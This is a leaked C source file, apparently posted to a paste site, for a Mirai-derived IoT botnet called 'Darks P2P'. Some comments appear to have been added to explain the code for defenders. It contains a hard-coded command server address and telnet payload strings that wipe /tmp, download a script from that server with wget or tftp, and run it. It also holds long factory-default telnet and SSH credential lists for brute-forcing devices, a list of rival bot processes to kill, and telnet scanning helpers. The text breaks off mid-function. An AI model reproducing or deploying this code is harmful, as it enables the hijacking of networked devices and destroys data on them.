mysql_Anarchy

[ C ] Darks P2P (LEAK)

Jun 4th, 2018
  1. #include <stdlib.h>
  2. #include <stdarg.h>
  3. #include <stdio.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <netinet/in.h>  
  7. #include <arpa/inet.h>
  8. #include <netdb.h>
  9. #include <signal.h>                                                      
  10. #include <strings.h>                                                      
  11. #include <sys/utsname.h>
  12. #include <unistd.h>
  13. #include <fcntl.h>
  14. #include <errno.h>
  15. #include <netinet/ip.h>
  16. #include <netinet/udp.h>
  17. #include <netinet/tcp.h>
  18. #include <sys/wait.h>
  19. #include <sys/ioctl.h>
  20. #include <net/if.h>
  21. #include <time.h>
  22. #include <dirent.h>
  23. #include <limits.h>
  24. #include <sys/stat.h>
  25. #include <sys/time.h>
  26. #include <string.h>
  27. #include <stdint.h>
  28. #include <stdio.h>
  29. #include <sys/param.h>
  30. #include <sys/time.h>
  31. //mirai
  32. #define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0)))
  33. typedef uint32_t ipv4_t;
  34. //end of mirai
  35. #define PR_SET_NAME 15
  36. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
  37. #define PAD_RIGHT 1
  38. #define PAD_ZERO 2
  39. #define PRINT_BUF_LEN 12
  40. #define CMD_IAC   255
  41. #define CMD_WILL  251
  42. #define CMD_WONT  252
  43. #define CMD_DO    253
  44. #define CMD_DONT  254
  45. #define OPT_SGA   3
  46. #define SOCKBUF_SIZE 1024
  47. #define PHI 0x9e3779b9
  /*
   * Report the CPU architecture this binary was built for.
   *
   * The choice is made by the preprocessor from compiler-predefined macros,
   * so at most one `return` survives compilation. Returns a pointer to a
   * string literal; "UNKNOWN" when none of the listed macros is defined.
   * Callers are outside this part of the file.
   */
  char *getBuild() {
      #if defined(__x86_64__) || defined(_M_X64)
      return "x86_64";
      #elif defined(__i386) || defined(_M_IX86)
      return "x86_32";
      #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
      return "ARM-4";
      #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
      return "ARM-5"
      #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
      return "ARM-6";
      #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
      return "MIPS";
      #elif defined(__sh__)
      return "SUPERH";
      #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
      return "POWERPC";
      #else
      return "UNKNOWN";
      #endif
  }
  /*
   * Table of browser User-Agent strings. Nothing in this part of the file
   * reads it; presumably it supplies the User-Agent header of generated HTTP
   * requests - confirm against the code that indexes it.
   */
  const char *useragents[] = {
      "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
      "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
      "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
      "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
      "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
      "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
      "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
      "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
      "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
      "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
      "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  };
  /*
   * Per-connection state for one telnet session. The field notes come from
   * the helpers visible in this part (advance_telstate, reset_telstate,
   * get_telstate_host); the loop that drives the states is outside this part.
   */
  struct telstate_t {
          int fd;                     // socket; closed by advance_telstate() when the new state is 0
          unsigned int ip;            // IPv4 address, copied unchanged into in_addr.s_addr by get_telstate_host()
          unsigned char state;        // current state number, written by advance_telstate()
          unsigned char complete;     // set to 1 by reset_telstate()
          unsigned char usernameInd;  /* presumably an index into a username table - confirm against the scanner loop */
          unsigned char passwordInd;  /* presumably an index into a password table - confirm */
          unsigned char tempDirInd;   /* presumably an index into Temp_Directorys - confirm */
          unsigned int tTimeout;      /* zeroed on every state change by advance_telstate() */
          unsigned short bufUsed;     // not touched by the helpers in this part
          char *sockbuf;              // receive buffer; advance_telstate() clears SOCKBUF_SIZE bytes of it
  };
  95. int initConnection();
  96. void makeRandomStr(unsigned char *buf, int length);
  97. int sockprintf(int sock, char *formatStr, ...);
  98. char *inet_ntoa(struct in_addr in);
  // Command-channel socket (recvLine() reads from it) and the index of the
  // server in use; -1 presumably means "none selected yet" - confirm.
  int mainCommSock = 0, currentServer = -1;
  // Child PIDs recorded by listFork().
  uint32_t *pids;
  // PIDs of individual worker processes; the code that assigns them is
  // outside this part of the file.
  uint32_t scanPid;
  uint32_t bcmPid;
  uint32_t testmiraiPid;
  uint32_t testtelnetPid;
  uint32_t scanPid;
  uint32_t miraiPid;
  uint16_t Phonepid;
  // Number of entries in pids; incremented by listFork().
  uint64_t numpids = 0;
  struct in_addr ourIP;
  unsigned char macAddress[6] = {0};
  // Hard-coded command-server endpoint of this sample, written as "IP:port".
  // The same address appears in the download commands below; for defenders it
  // is a network indicator taken from this sample.
  unsigned char *commServer[] = { "89.34.99.155:52" };
  int Server_Botport = 52;
  // Substrings to look for in telnet output; the consumer is outside this part.
  char* phone[] = {":", "ogin", "sername", "assword", "Linux", "9615-cdp", (char*)0};
  // Shell command lines stored as strings. Each one changes into /tmp, deletes
  // what is there, downloads a script or binary from the hard-coded host with
  // wget or tftp, runs it and removes it again; where they are sent is outside
  // this part. What to alert on: a remote login session on an embedded device
  // that starts wget or tftp writing into /tmp, followed by chmod 777 and
  // execution of the downloaded file. Host and file names are indicators from
  // this sample.
  char *Busybox_Payload = "cd /tmp;rm -rf *; busybox wget http://89.34.99.155/fyfa.sh; chmod 777 fyfa.sh; sh fyfa.sh;busybox tftp 89.34.99.155 -c get tfyfa.sh; chmod 777 tfyfa.sh; sh tfyfa.sh;busybox tftp -r tfyfa2.sh -g 89.34.99.155; chmod 777 tfyfa2.sh; sh tfyfa2.sh; rm -rf fyfa.sh tfyfa.sh tfyfa2.sh; rm -rf fyfa*\r\n"; //Telnet Scanner Must implement Busybox.
  char *Payload = "cd /tmp;rm -rf *;cd /tmp/;wget http://89.34.99.155/fyfa.sh;sh fyfa.sh;rm -rf fyfa.sh;cd /tmp/;wget http://89.34.99.155/fyfa.sh;sh fyfa.sh;rm -rf bis.sh"; //Normal Payload Without busybox Implemented.
  char *phonepayload = "cd /tmp;rm -rf *;cd /tmp; wget http://89.34.99.155/fyfaarm -O phone; chmod 777 phone; ./phone;rm -rf phone\r\n";
  /*
   * Usernames of factory-default telnet logins, one array of a
   * username/password pair (see Telnet_Passwords). The trailing comments are
   * the original author's. Devices that keep factory logins and expose telnet
   * are what such a list relies on.
   */
  char *Telnet_Usernames[] = {
      "telnet\0", //telnet:telnet
      "root\0", //root:
      "root\0", //root:1234
  };
  /*
   * Passwords belonging to Telnet_Usernames. The trailing comments are the
   * original author's and do not always match the literal on the same line;
   * read the literals, not the comments.
   */
  char *Telnet_Passwords[] = {
      "telnet\0", //telnet:telnet
      "\0", //root:1234
      "root\0", //root:1234
  };
  /*
   * Username half of a list of factory-default device logins (password half:
   * Mirai_Passwords). The code that walks the list is outside this part.
   * The trailing `user:pass` comments are the original author's and do not
   * always match the literal on the same line; read the literals, not the
   * comments. For defenders the list is an inventory of factory logins to
   * audit for on deployed devices.
   */
  char *Mirai_Usernames[] = {
      "telnet\0"
      "root\0", //root:xc3511
      "root\0", //root:vizxv
      "root\0", //root:admin
      "admin\0", //admin:admin
      "root\0", //root:888888
      "root\0", //root:xmhdipc
      "root\0", //root:default
      "root\0", //root:juantech
      "root\0", //root:123456
      "root\0", //root:54321
      "support\0", //support:support
      "root\0", //root:(none)
      "admin\0", //admin:password
      "root\0", //root:root
      "root\0", //root:12345
      "user\0", //user:user
      "admin\0", //admin:(none)
      "root\0", //root:pass
      "admin\0", //admin:admin1234
      "root\0", //root:1111
      "admin\0", //admin:smcadmin
      "admin\0", //admin:1111
      "root\0", //root:666666
      "root\0", //root:password
      "root\0", //root:1234
      "root\0", //root:klv123
      "Administrator\0", //Administrator:admin
      "service\0", //service:service
      "supervisor\0", //supervisor:supervisor
      "guest\0", //guest:guest
      "guest\0", //guest:12345
      "guest\0", //guest:12345
      "admin1\0", //admin1:password
      "administrator\0", //administrator:1234
      "666666\0", //666666:666666
      "888888\0", //888888:888888
      "ubnt\0", //ubnt:ubnt
      "klv1234\0", //root:klv1234
      "Zte521\0", //root:Zte521
      "hi3518\0", //root:hi3518
      "jvbzd\0", //root:jvbzd
      "anko\0", //root:anko
      "zlxx\0", //root:zlxx
      "7ujMko0vizxv\0", //root:7ujMko0vizxv
      "7ujMko0admin\0", //root:7ujMko0admin
      "system\0", //root:system
      "ikwb\0", //root:ikwb
      "dreambox\0", //root:dreambox
      "user\0", //root:user
      "realtek\0", //root:realtek
      "00000000\0", //root:00000000
      "1111111\0", //admin:1111111
      "1234\0", //admin:1234
      "12345\0", //admin:12345
      "54321\0", //admin:54321
      "123456\0", //admin:123456
      "7ujMko0admin\0", //admin:7ujMko0admin
      "1234\0", //admin:1234
      "pass\0", //admin:pass
      "meinsm\0", //admin:meinsm
      "tech\0", //tech:tech
      "fucker\0", //mother:fucker
      "pi\0", //mother:fucker
  };
  /*
   * Password half of the factory-default login list (username half:
   * Mirai_Usernames). The trailing `user:pass` comments are the original
   * author's and do not always match the literal on the same line; read the
   * literals, not the comments. Any device still answering to one of these
   * passwords on a remote login service should have it changed or the service
   * closed.
   */
  char *Mirai_Passwords[] = {
      "telnet\0"
      "xc3511\0", //root:xc3511
      "vizxv\0", //root:vizxv
      "admin\0", //root:admin
      "admin\0", //admin:admin
      "888888\0", //root:888888
      "xmhdipc\0", //root:xmhdipc
      "default\0", //root:default
      "juantech\0", //root:juantech
      "123456\0", //root:123456
      "54321\0", //root:54321
      "support\0", //support:support
      "\0", //root:(none)
      "password\0", //admin:password
      "root\0", //root:root
      "12345\0", //root:12345
      "user\0", //user:user
      "\0", //admin:(none)
      "pass\0", //root:pass
      "admin1234\0", //admin:admin1234
      "1111\0", //root:1111
      "smcadmin\0", //admin:smcadmin
      "1111\0", //admin:1111
      "666666\0", //root:666666
      "password\0", //root:password
      "1234\0", //root:1234
      "klv123\0", //root:klv123
      "admin\0", //Administrator:admin
      "service\0", //service:service
      "supervisor\0", //supervisor:supervisor
      "guest\0", //guest:guest
      "12345\0", //guest:12345
      "123456\0", //guest:12345
      "password\0", //admin1:password
      "1234\0", //administrator:1234
      "666666\0", //666666:666666
      "888888\0", //888888:888888
      "ubnt\0", //ubnt:ubnt
      "klv1234\0", //root:klv1234
      "Zte521\0", //root:Zte521
      "hi3518\0", //root:hi3518
      "jvbzd\0", //root:jvbzd
      "anko\0", //root:anko
      "zlxx\0", //root:zlxx
      "7ujMko0vizxv\0", //root:7ujMko0vizxv
      "7ujMko0admin\0", //root:7ujMko0admin
      "system\0", //root:system
      "ikwb\0", //root:ikwb
      "dreambox\0", //root:dreambox
      "user\0", //root:user
      "realtek\0", //root:realtek
      "00000000\0", //root:00000000
      "1111111\0", //admin:1111111
      "1234\0", //admin:1234
      "12345\0", //admin:12345
      "54321\0", //admin:54321
      "123456\0", //admin:123456
      "7ujMko0admin\0", //admin:7ujMko0admin
      "1234\0", //admin:1234
      "pass\0", //admin:pass
      "meinsm\0", //admin:meinsm
      "tech\0", //tech:tech
      "fucker\0", //mother:fucker
      "raspberry\0", //mother:fucker
     
  };
  /*
   * Usernames of factory-default SSH logins (passwords: SSH_Passwords). The
   * code that uses the list is outside this part. The trailing comments are
   * the original author's and do not always match the literal on the line.
   */
  char *SSH_Usernames[] = {
      "root\0", //root:root
      "admin\0", //admin:admin
      "admin\0", //admin:1234
      "ubnt\0", //ubnt:ubnt
      "pi\0", //mother:fucker
  };
  /*
   * Passwords belonging to SSH_Usernames. The trailing comments are the
   * original author's and do not always match the literal on the line.
   */
  char *SSH_Passwords[] = {
      "root\0", //root:root
      "admin\0", //admin:admin
      "1234\0", //admin:1234
      "ubnt\0", //ubnt:ubnt
      "raspberry\0", //mother:fucker
  };
  /*
   * Process or file name patterns, some ending in `*`. The code that reads
   * the table is outside this part; judging by the name it lists binaries of
   * other bots to be terminated, presumably matched with wildString() -
   * confirm. Note that ordinary system names ("sh", "wget", "busybox") are
   * listed too, so on an affected device missing or killed system utilities
   * can be a symptom.
   */
  char *Bot_Killer_Binarys[] = {
      "mips",
      "mipsel",
      "sh4",
      "x86",
      "i686",
      "ppc",
      "i586",
      "i586",
      "jack*",
      "hack*",
      "arm*"
      "tel*"
      "b1",
      "b2",
      "b3",
      "b4",
      "b5",
      "b6",
      "b7",
      "b8",
      "b9",
      "lol*",
      "busybox*",
      "badbox*",
      "DFhxdhdf",
      "dvrHelper",
      "FDFDHFC",
      "FEUB",
      "FTUdftui",
      "GHfjfgvj",
      "jhUOH",
      "JIPJIPJj",
      "JIPJuipjh",
      "kmyx86_64",
      "lolmipsel",
      "mips",
      "mipsel",
      "RYrydry",
      "TwoFace*",
      "UYyuyioy",
      "wget",
      "x86_64",
      "XDzdfxzf",
      "xx*",
      "sh",
      "1",
      "2",
      "3",
      "4",
      "5",
      "6",
      "7",
      "8",
      "9",
      "10",
      "11",
      "12",
      "13",
      "14",
      "15",
      "16",
      "17",
      "18",
      "19",
      "20",
      "busybox",
      "badbox",
      "Mirai*",
      "mirai*",
      "cunty*",
      "IoT*",
      "pl0*",
      "cc*"
      };
  // Null-terminated string tables. `fails` and `successes` are the tables
  // searched by contains_fail() and contains_success(); the users of
  // Temp_Directorys, advances and advances2 are outside this part.
  // The entries are fragments of login prompts, error messages and shell
  // prompts as a telnet server prints them, compared case-insensitively.
  char *Temp_Directorys[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*",  (char*) 0};
  char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
  char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
  char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
  // Generator state shared by init_rand() and rand_cmwc(): a 4096-word table
  // and a carry word.
  static uint32_t Q[4096], c = 362436;
  /*
   * Seed the generator table from x. The first three words are x, x + PHI and
   * x + 2*PHI; every later word is derived from earlier words, PHI and its
   * own index. The carry word c is not reset here.
   */
  void init_rand(uint32_t x) {
          int i;
          Q[0] = x;
          Q[1] = x + PHI;
          Q[2] = x + PHI + PHI;
          for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  }
  /*
   * Return the next 32-bit pseudo-random value and update the state in Q and c.
   * The name suggests a complementary-multiply-with-carry generator; the
   * state must have been seeded with init_rand() for the output to depend on
   * a seed. Not a cryptographic generator.
   */
  uint32_t rand_cmwc(void) {
          uint64_t t, a = 18782LL;
          static uint32_t i = 4095;   // position in Q, kept across calls
          uint32_t x, r = 0xfffffffe;
          i = (i + 1) & 4095;         // advance and wrap at the table size
          t = a * Q[i] + c;           // 64-bit product plus previous carry
          c = (uint32_t)(t >> 32);    // new carry is the upper half
          x = t + c;                  // truncated to 32 bits on assignment
          if (x < c) {                // the addition wrapped around
                  x++;
                  c++;
          }
          return (Q[i] = r - x);      // store the new word and return it
  }
  /*
   * Read from fd into buffer one byte at a time. The loop ends when read()
   * returns something other than 1, when bufferSize bytes have been counted,
   * or when the previously stored byte is '\n'.
   *
   * Returns NULL when the last read() returned 0 (end of file), otherwise
   * buffer. No terminating NUL is written; the caller has to supply a zeroed
   * buffer. On the first pass total is 0, so the loop condition inspects the
   * byte just before buffer.
   */
  unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
  {
  int got = 1, total = 0;
  while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  return got == 0 ? NULL : buffer;
  }
  /*
   * Return 1 if buffer contains any entry of the null-terminated table
   * `strings` as a case-insensitive substring (strcasestr), otherwise 0.
   * The counting loop pre-increments, so entry 0 is never tested for the
   * terminator: the table must hold at least one string.
   */
  int contains_string(char* buffer, char** strings) {
          int num_strings = 0, i = 0;
          // count entries up to the terminating null pointer
          for(num_strings = 0; strings[++num_strings] != 0; );
          for(i = 0; i < num_strings; i++) {
                  if(strcasestr(buffer, strings[i])) {
                          return 1;
                  }
          }
          return 0;
  }
  // Return 1 if buffer contains an entry of the `successes` table, else 0.
  int contains_success(char* buffer) {
          return contains_string(buffer, successes);
  }
  // Return 1 if buffer contains an entry of the `fails` table, else 0.
  int contains_fail(char* buffer) {
          return contains_string(buffer, fails);
  }
  // Return non-zero if buffer matches either table; `successes` is checked first.
  int contains_response(char* buffer) {
          return contains_success(buffer) || contains_fail(buffer);
  }
  /*
   * Wait up to timeout_usec microseconds for fd to become readable, then do
   * one recv() of at most buf_size bytes into buffer.
   *
   * Returns 0 when select() reports nothing readable (timeout or error),
   * otherwise the return value of recv(), which can be -1 or 0.
   */
  int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
          fd_set read_set;
          struct timeval tv;
          tv.tv_sec = 0;
          tv.tv_usec = timeout_usec;
          FD_ZERO(&read_set);
          FD_SET(fd, &read_set);
          if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
          return 0;
          return recv(fd, buffer, buf_size, 0);
  }
  /*
   * Clear buffer, perform a single timed read from fd, and report whether the
   * received text contains any entry of `strings`.
   *
   * When the first received byte compares equal to 0xFF (telnet IAC) the
   * data is handed to negotiate() before matching. Despite the name there is
   * no loop: one read per call. Returns 1 on a match, 0 otherwise; the number
   * of bytes read is not returned.
   */
  int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
          int num_bytes, i;
          memset(buffer, 0, buf_size);
          num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
          if(buffer[0] == 0xFF) {
                  negotiate(fd, buffer, 3);
          }
          if(contains_string(buffer, strings)) {
                  return 1;
          }
          return 0;
  }
  /*
   * Return the session's IPv4 address as dotted-quad text. The string comes
   * from inet_ntoa(), whose result is a static buffer reused by later calls.
   */
  const char* get_telstate_host(struct telstate_t* telstate) { // get host
          struct in_addr in_addr_ip;
          in_addr_ip.s_addr = telstate->ip;
          return inet_ntoa(in_addr_ip);
  }
  /*
   * Move a session to new_state: reset its timeout counter and clear
   * SOCKBUF_SIZE bytes of its receive buffer. State 0 additionally closes
   * the socket.
   */
  void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
          if(new_state == 0) {
                  close(telstate->fd);
          }
          telstate->tTimeout = 0;
          telstate->state = new_state;
          memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
  }
  // Return a session to state 0 (which closes its socket) and mark it complete.
  void reset_telstate(struct telstate_t* telstate) { // reset
          advance_telstate(telstate, 0);
          telstate->complete = 1;
  }
  /*
   * Strip leading and trailing whitespace from str in place. The remaining
   * characters are shifted to the start of the buffer and NUL-terminated.
   */
  void trim(char *str) {
          int first = 0;
          int last = strlen(str) - 1;
          int pos;

          /* skip whitespace at the front */
          for (; isspace(str[first]); first++)
                  ;
          /* back up over whitespace at the end */
          for (; (last >= first) && isspace(str[last]); last--)
                  ;
          /* slide the kept range down to index 0 */
          pos = first;
          while (pos <= last) {
                  str[pos - first] = str[pos];
                  pos++;
          }
          str[pos - first] = '\0';
  }
  /*
   * Emit one character. With a destination (str != NULL) the character is
   * stored at *str and the pointer advanced; no bound is checked. Without a
   * destination one byte taken from the address of the int c is written to
   * file descriptor 1.
   */
  static void printchar(unsigned char **str, int c) {
          if (str) {
                  **str = c;
                  ++(*str);
          }
          else (void)write(1, &c, 1);
  }
  /*
   * Emit `string` padded to `width` characters and return the number of
   * characters emitted. `pad` is a bit set: PAD_RIGHT pads after the text
   * instead of before it, PAD_ZERO pads with '0' instead of ' '. A string
   * that is at least `width` long is emitted unpadded and never truncated.
   */
  static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
          register int pc = 0, padchar = ' ';
          if (width > 0) {
                  register int len = 0;
                  register const unsigned char *ptr;
                  for (ptr = string; *ptr; ++ptr) ++len;
                  // from here on width holds the number of pad characters
                  if (len >= width) width = 0;
                  else width -= len;
                  if (pad & PAD_ZERO) padchar = '0';
          }
          if (!(pad & PAD_RIGHT)) {
                  for ( ; width > 0; --width) {
                          printchar (out, padchar);
                          ++pc;
                  }
          }
          for ( ; *string ; ++string) {
                  printchar (out, *string);
                  ++pc;
          }
          // runs only for PAD_RIGHT: otherwise width is already 0 here
          for ( ; width > 0; --width) {
                  printchar (out, padchar);
                  ++pc;
          }
          return pc;
  }
  /*
   * Emit the integer i in base b and return the number of characters emitted.
   *
   * sg      non-zero: treat i as signed (a minus sign is produced for base 10)
   * width   minimum field width, passed on to prints()
   * pad     PAD_RIGHT / PAD_ZERO bits, passed on to prints()
   * letbase 'a' or 'A', the letter used for digit value 10
   *
   * Digits are built backwards from the end of a PRINT_BUF_LEN-byte buffer.
   */
  static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
          unsigned char print_buf[PRINT_BUF_LEN];
          register unsigned char *s;
          register int t, neg = 0, pc = 0;
          register unsigned int u = i;
          if (i == 0) {
                  print_buf[0] = '0';
                  print_buf[1] = '\0';
                  return prints (out, print_buf, width, pad);
          }
          if (sg && b == 10 && i < 0) {
                  neg = 1;
                  u = -i;
          }
          s = print_buf + PRINT_BUF_LEN-1;
          *s = '\0';
          while (u) {
                  t = u % b;
                  if( t >= 10 )
                  t += letbase - '0' - 10;
                  *--s = t + '0';
                  u /= b;
          }
          if (neg) {
                  // with zero padding the sign goes out first so it precedes the zeros
                  if( width && (pad & PAD_ZERO) ) {
                          printchar (out, '-');
                          ++pc;
                          --width;
                  }
                  else {
                          *--s = '-';
                  }
          }
          return pc + prints (out, s, width, pad);
  }
  /*
   * Minimal printf engine. Formats into *out when out is non-NULL, otherwise
   * to file descriptor 1 through printchar(). Returns the number of
   * characters emitted.
   *
   * Supported: "%%", flags '-' and '0', a decimal width, and the conversions
   * s, d, x, X, u, c. Any other conversion character is skipped without
   * output. Every argument, including the one for %s, is fetched with
   * va_arg(args, int). Output to *out is not bounded; the destination must be
   * large enough. va_end() is called on the caller's va_list before return.
   */
  static int print(unsigned char **out, const unsigned char *format, va_list args ) {
          register int width, pad;
          register int pc = 0;
          unsigned char scr[2];
          for (; *format != 0; ++format) {
                  if (*format == '%') {
                          ++format;
                          width = pad = 0;
                          if (*format == '\0') break;
                          if (*format == '%') goto out;   // "%%" prints a literal '%'
                          if (*format == '-') {
                                  ++format;
                                  pad = PAD_RIGHT;
                          }
                          while (*format == '0') {
                                  ++format;
                                  pad |= PAD_ZERO;
                          }
                          for ( ; *format >= '0' && *format <= '9'; ++format) {
                                  width *= 10;
                                  width += *format - '0';
                          }
                          if( *format == 's' ) {
                                  register char *s = (char *)va_arg( args, int );
                                  pc += prints (out, s?s:"(null)", width, pad);
                                  continue;
                          }
                          if( *format == 'd' ) {
                                  pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
                                  continue;
                          }
                          if( *format == 'x' ) {
                                  pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
                                  continue;
                          }
                          if( *format == 'X' ) {
                                  pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
                                  continue;
                          }
                          if( *format == 'u' ) {
                                  pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
                                  continue;
                          }
                          if( *format == 'c' ) {
                                  scr[0] = (unsigned char)va_arg( args, int );
                                  scr[1] = '\0';
                                  pc += prints (out, scr, width, pad);
                                  continue;
                          }
                  }
                  else {
  out:
                          printchar (out, *format);
                          ++pc;
                  }
          }
          if (out) **out = '\0';   // terminate the destination string
          va_end( args );
          return pc;
  }
  // printf replacement writing to file descriptor 1 via print(); returns the
  // number of characters emitted. va_end() is performed inside print().
  int zprintf(const unsigned char *format, ...) {
          va_list args;
          va_start( args, format );
          return print( 0, format, args );
  }
  // sprintf replacement: formats into `out` via print() and NUL-terminates.
  // The size of `out` is not known here, so the caller must guarantee it is
  // large enough. Returns the number of characters written.
  int szprintf(unsigned char *out, const unsigned char *format, ...) {
          va_list args;
          va_start( args, format );
          return print( &out, format, args );
  }
  /*
   * Format a message, append '\n', echo it to file descriptor 1 and send it
   * on `sock`. Returns the result of send().
   *
   * The message is built in a 2048-byte heap buffer; the malloc() result is
   * not checked and print() does not bound its output, so the formatted text
   * must fit. MSG_NOSIGNAL keeps a closed peer from raising SIGPIPE.
   */
  int sockprintf(int sock, char *formatStr, ...) {
          unsigned char *textBuffer = malloc(2048);
          memset(textBuffer, 0, 2048);
          char *orig = textBuffer;    // print() advances textBuffer; keep the start
          va_list args;
          va_start(args, formatStr);
          print(&textBuffer, formatStr, args);
          va_end(args);
          orig[strlen(orig)] = '\n';  // still terminated because the buffer was zeroed
          zprintf("%s\n", orig);
          int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
          free(orig);
          return q;
  }
  /*
   * Case-insensitive wildcard comparison. `*` in pattern stands for any run
   * of characters (including none), `?` for exactly one character.
   *
   * Returns 0 when string matches pattern and non-zero otherwise, in the
   * manner of strcmp(). When the pattern is exhausted the result is the
   * current character of string, so the non-zero value is not always 1.
   */
  int wildString(const unsigned char* pattern, const unsigned char* string) {
          const unsigned char head = *pattern;

          /* end of pattern: a match only if the string has ended too */
          if (head == '\0') {
                  return *string;
          }

          if (head == '*') {
                  /* first let the star stand for nothing */
                  if (wildString(pattern + 1, string) == 0) {
                          return 0;
                  }
                  /* then let it swallow one more character */
                  if (*string && wildString(pattern, string + 1) == 0) {
                          return 0;
                  }
                  return 1;
          }

          if (head == '?') {
                  if (*string && wildString(pattern + 1, string + 1) == 0) {
                          return 0;
                  }
                  return 1;
          }

          /* literal character, compared without regard to case */
          if ((toupper(head) == toupper(*string)) && wildString(pattern + 1, string + 1) == 0) {
                  return 0;
          }
          return 1;
  }
  /*
   * Parse toGet as a dotted-quad IPv4 address with inet_addr() and store it
   * in *i. Returns 1 when inet_addr() reports failure (-1), 0 on success.
   * No name resolution takes place; the hostent variable is unused.
   */
  int getHost(unsigned char *toGet, struct in_addr *i) {
          struct hostent *h;
          if((i->s_addr = inet_addr(toGet)) == -1) return 1;
          return 0;
  }
  // Fill buf with `length` characters in the range 65..90 ('A'..'Z') drawn
  // from rand_cmwc(). No terminating NUL is written.
  void makeRandomStr(unsigned char *buf, int length) {
          int i = 0;
          for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  }
  /*
   * Receive one line (up to and including '\n') into buf, NUL-terminated.
   *
   * First waits for `socket` with select() and a 30-second timeout, retrying
   * while retryCount is below 10; retryCount has no initial value. The bytes
   * themselves are then read one at a time from the global mainCommSock, not
   * from the `socket` argument.
   *
   * Returns the number of bytes stored before the newline, or -1 when a
   * recv() does not deliver exactly one byte.
   */
  int recvLine(int socket, unsigned char *buf, int bufsize) {
          memset(buf, 0, bufsize);
          fd_set myset;
          struct timeval tv;
          tv.tv_sec = 30;
          tv.tv_usec = 0;
          FD_ZERO(&myset);
          FD_SET(socket, &myset);
          int selectRtn, retryCount;
          // the same set is passed as read set and as exception set
          if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
                  while(retryCount < 10) {
                          tv.tv_sec = 30;
                          tv.tv_usec = 0;
                          FD_ZERO(&myset);
                          FD_SET(socket, &myset);
                          if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
                                  retryCount++;
                                  continue;
                          }
                          break;
                  }
          }
          unsigned char tmpchr;
          unsigned char *cp;
          int count = 0;
          cp = buf;
          // leave room for the terminating NUL
          while(bufsize-- > 1) {
                  if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
                          *cp = 0x00;
                          return -1;
                  }
                  *cp++ = tmpchr;
                  if(tmpchr == '\n') break;
                  count++;
          }
          *cp = 0x00;
          return count;
  }
  /*
   * Connect fd to host:port, giving up after `timeout` seconds.
   *
   * host must be a dotted-quad IPv4 string (see getHost()). The socket is
   * switched to non-blocking mode for the connect and back to blocking mode
   * on success; on the failure paths it stays non-blocking.
   *
   * Returns 1 when the connection is established, 0 otherwise.
   */
  int connectTimeout(int fd, char *host, int port, int timeout) {
          struct sockaddr_in dest_addr;
          fd_set myset;
          struct timeval tv;
          socklen_t lon;
          int valopt;
          long arg = fcntl(fd, F_GETFL, NULL);
          arg |= O_NONBLOCK;
          fcntl(fd, F_SETFL, arg);
          dest_addr.sin_family = AF_INET;
          dest_addr.sin_port = htons(port);
          if(getHost(host, &dest_addr.sin_addr)) return 0;
          memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
